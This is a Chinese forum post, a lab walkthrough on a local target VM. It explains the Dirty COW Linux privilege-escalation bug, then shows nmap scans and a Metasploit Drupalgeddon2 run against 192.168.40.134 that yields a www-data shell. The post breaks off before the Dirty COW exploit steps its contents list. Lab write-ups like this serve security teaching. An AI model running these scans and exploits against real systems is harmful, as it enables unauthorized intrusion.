论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com
»
论坛
›
安全
›
网络安全
›
脏牛提权(靶机复现)
脏牛提权(靶机复现)
刘俊凯
论坛元老
|
2024-7-14 17:48:23
|
显示全部楼层
|
阅读模式
楼主
主题
1012
|
帖子
1012
|
积分
3040
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
目次
一、脏牛毛病概述
二、毛病复现
1.nmap信息收集
1.1.检察当前IP所在
1.2.扫描当前网段,找出目标机器
1.3.快速扫描目标机全端口
三、访问收集到的资产
192.168.40.134:80
192.168.40.134:1898
四、msf攻击
1.查找对应exp
2.选择对应exp并配置相干设置
五、内网毛病信息收集
六、毛病利用
方法一
1.上传毛病exp举行利用
2.上传exp
3.编译exp并使用python开启一个bash终端
4.执行编译后的exp
5.su登录root账户
方法二
1.通过排查信息,发现网站配置信息
2.ssh毗连
3.传入exp并编译执行。
一、脏牛毛病概述
脏牛毛病,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此毛病。Linux kernel团队在2016年10月18日已经对此举行了修复。
毛病范围
Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)
毛病编号
脏牛的CVE编号是CVE-2016-5195。
毛病危害
低权限用户利用该毛病技能可以在全版本Linux系统上实现本地提权
毛病原理
该毛病详细为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。
恶意用户可利用此毛病,来获取高权限,对只读内存映射举行写访问。
竞争条件,指的是任务执行序次异常,可导致应用瓦解,或令攻击者有机可乘,进一步执行其他代码。
利用这一毛病,攻击者可在其目标系统提升权限,甚至可能获得root权限。
二、毛病复现
环境:同一内网下
靶机下载:
链接:百度网盘 请输入提取码
提取码:TBUG
1.nmap信息收集
1.1.检察当前IP所在
┌──(root㉿tubug)-[~/桌面]
└─# ifconfig eth0 | grep inet
inet 192.168.40.130 netmask 255.255.255.0 broadcast 192.168.40.255
inet6 fe80::20c:29ff:fe88:e3c prefixlen 64 scopeid 0x20<link>
复制代码
1.2.扫描当前网段,找出目标机器
┌──(root㉿tubug)-[~/桌面]
└─# nmap -sP 192.168.40.0/24
/*
-s 指定扫描技术
-P ping操作
-sP 使用ping操作来寻找存活主机
*/
发现目标机为:192.168.40.134
复制代码
1.3.快速扫描目标机全端口
┌──(root㉿tubug)-[~/桌面]
└─# nmap -sS -p 1-65535 192.168.40.134
/*
-sS SYN扫描技术
-p 指定端口
*/
复制代码
三、访问收集到的资产
192.168.40.134:80
192.168.40.134:1898
访问发现关键信息网站指纹:
Drupal
四、msf攻击
1.查找对应exp
┌──(root㉿tubug)-[~/桌面]
└─# msfconsole
msf6 > search drupal
复制代码
2.选择对应exp并配置相干设置
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.40.134
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
meterpreter > getuid
Server username: www-data
该exp漏洞属于远程代码执行漏洞
构造特殊的HTTP请求,将恶意代码注入到网站的表单处理程序中从而执行恶意代码。
复制代码
五、内网毛病信息收集
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
刘俊凯
论坛元老
这个人很懒什么都没写!
楼主热帖
牛客SQL刷题第三趴——SQL大厂面试真题 ...
IDEA中集成Git操作以及关于Git中分支说 ...
SAP MM 使用两个STO实现免关税跨国公 ...
github上fork2.4k,star8.7k的这款状态 ...
Bug驱动开发探讨
MySQL ——select语句 一条龙服务 ...
哈工大信息安全概论期末复习 ...
袋鼠云春季生长大会最新议程来啦!4月2 ...
事务
2023H1中国超融合市场第二!深信服超融 ...
标签云
AI
运维
CIO
存储
服务器
浏览过的版块
分布式数据库
DevOps与敏捷开发
Java
.Net
虚拟化与私有云
Oracle
快速回复
返回顶部
返回列表